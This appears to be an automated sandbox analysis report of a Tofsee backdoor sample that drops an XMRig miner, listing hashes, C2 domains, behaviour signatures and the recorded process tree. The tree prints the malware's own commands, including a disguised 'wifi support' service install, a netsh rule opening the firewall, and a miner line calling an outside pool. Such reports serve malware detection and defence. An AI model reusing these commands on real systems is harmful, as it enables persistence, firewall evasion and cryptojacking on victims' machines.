Analysis

  • max time kernel
    152s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    04-06-2022 23:34

General

  • Target

    a005a2ab607819251daed1eb736c0e83989bff4f92ea2a9b79e012cfad784baa.exe

  • Size

    197KB

  • MD5

    f7c4fad9f2e19285fa11fbe4ee0bf974

  • SHA1

    4909cdd90cee25fc84102df509ea8ff9fdb377fd

  • SHA256

    a005a2ab607819251daed1eb736c0e83989bff4f92ea2a9b79e012cfad784baa

  • SHA512

    c8a4c69e5f3d16d1b5bd99720ce0fdc3274d7aac5e287b3df011da49845f2b1aa9935c04826c1515207ccda71921d65beccfa0081a54b07ba765e2968fcc36b2

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a005a2ab607819251daed1eb736c0e83989bff4f92ea2a9b79e012cfad784baa.exe
    "C:\Users\Admin\AppData\Local\Temp\a005a2ab607819251daed1eb736c0e83989bff4f92ea2a9b79e012cfad784baa.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4184
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hrejhcdb\
      2⤵
        PID:4876
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\pkuqepu.exe" C:\Windows\SysWOW64\hrejhcdb\
        2⤵
          PID:4276
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create hrejhcdb binPath= "C:\Windows\SysWOW64\hrejhcdb\pkuqepu.exe /d\"C:\Users\Admin\AppData\Local\Temp\a005a2ab607819251daed1eb736c0e83989bff4f92ea2a9b79e012cfad784baa.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1324
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description hrejhcdb "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1508
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start hrejhcdb
          2⤵
          • Launches sc.exe
          PID:1396
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4616
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 684
          2⤵
          • Program crash
          PID:1744
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4184 -ip 4184
        1⤵
          PID:4584
        • C:\Windows\SysWOW64\hrejhcdb\pkuqepu.exe
          C:\Windows\SysWOW64\hrejhcdb\pkuqepu.exe /d"C:\Users\Admin\AppData\Local\Temp\a005a2ab607819251daed1eb736c0e83989bff4f92ea2a9b79e012cfad784baa.exe"
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4468
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe
            2⤵
            • Sets service image path in registry
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Modifies data under HKEY_USERS
            • Suspicious use of WriteProcessMemory
            PID:1392
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1424
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 536
            2⤵
            • Program crash
            PID:2604
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4468 -ip 4468
          1⤵
            PID:2740

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\pkuqepu.exe
            Filesize

            13.5MB

            MD5

            2b2fdc366c1b49c42a891441b491f540

            SHA1

            791fc5e379f8212c5ac24a4821a96e451a9eb284

            SHA256

            55d6781bff169ac5d9c55fc391e36e910d1974ba0ea20fbc1376a009cde849d0

            SHA512

            7a68a6895e22a74b42fbc850702a9d9ed351b8b1b6e81323c5c6b21c5adf6e3a225f889d9fc3183fafc28f8ef7adbaa1f6f15133f46bd7322b8bc0dd43a7d093

          • C:\Windows\SysWOW64\hrejhcdb\pkuqepu.exe
            Filesize

            13.5MB

            MD5

            2b2fdc366c1b49c42a891441b491f540

            SHA1

            791fc5e379f8212c5ac24a4821a96e451a9eb284

            SHA256

            55d6781bff169ac5d9c55fc391e36e910d1974ba0ea20fbc1376a009cde849d0

            SHA512

            7a68a6895e22a74b42fbc850702a9d9ed351b8b1b6e81323c5c6b21c5adf6e3a225f889d9fc3183fafc28f8ef7adbaa1f6f15133f46bd7322b8bc0dd43a7d093

          • memory/1324-136-0x0000000000000000-mapping.dmp
          • memory/1392-157-0x0000000002160000-0x0000000002170000-memory.dmp
            Filesize

            64KB

          • memory/1392-143-0x0000000000000000-mapping.dmp
          • memory/1392-149-0x0000000000CD0000-0x0000000000CE5000-memory.dmp
            Filesize

            84KB

          • memory/1392-151-0x0000000002A00000-0x0000000002C0F000-memory.dmp
            Filesize

            2.1MB

          • memory/1392-154-0x0000000000FF0000-0x0000000000FF6000-memory.dmp
            Filesize

            24KB

          • memory/1392-144-0x0000000000CD0000-0x0000000000CE5000-memory.dmp
            Filesize

            84KB

          • memory/1392-150-0x0000000000CD0000-0x0000000000CE5000-memory.dmp
            Filesize

            84KB

          • memory/1392-166-0x0000000002DD0000-0x0000000002DD7000-memory.dmp
            Filesize

            28KB

          • memory/1392-163-0x0000000007880000-0x0000000007C8B000-memory.dmp
            Filesize

            4.0MB

          • memory/1392-160-0x00000000021F0000-0x00000000021F5000-memory.dmp
            Filesize

            20KB

          • memory/1396-138-0x0000000000000000-mapping.dmp
          • memory/1424-169-0x0000000000000000-mapping.dmp
          • memory/1424-170-0x0000000000600000-0x00000000006F1000-memory.dmp
            Filesize

            964KB

          • memory/1424-175-0x0000000000600000-0x00000000006F1000-memory.dmp
            Filesize

            964KB

          • memory/1508-137-0x0000000000000000-mapping.dmp
          • memory/4184-131-0x0000000000AB0000-0x0000000000AC3000-memory.dmp
            Filesize

            76KB

          • memory/4184-130-0x000000000097F000-0x000000000098D000-memory.dmp
            Filesize

            56KB

          • memory/4184-142-0x0000000000400000-0x00000000008FB000-memory.dmp
            Filesize

            5.0MB

          • memory/4184-141-0x000000000097F000-0x000000000098D000-memory.dmp
            Filesize

            56KB

          • memory/4184-132-0x0000000000400000-0x00000000008FB000-memory.dmp
            Filesize

            5.0MB

          • memory/4276-134-0x0000000000000000-mapping.dmp
          • memory/4468-148-0x0000000000400000-0x00000000008FB000-memory.dmp
            Filesize

            5.0MB

          • memory/4468-146-0x00000000009CA000-0x00000000009D8000-memory.dmp
            Filesize

            56KB

          • memory/4616-139-0x0000000000000000-mapping.dmp
          • memory/4876-133-0x0000000000000000-mapping.dmp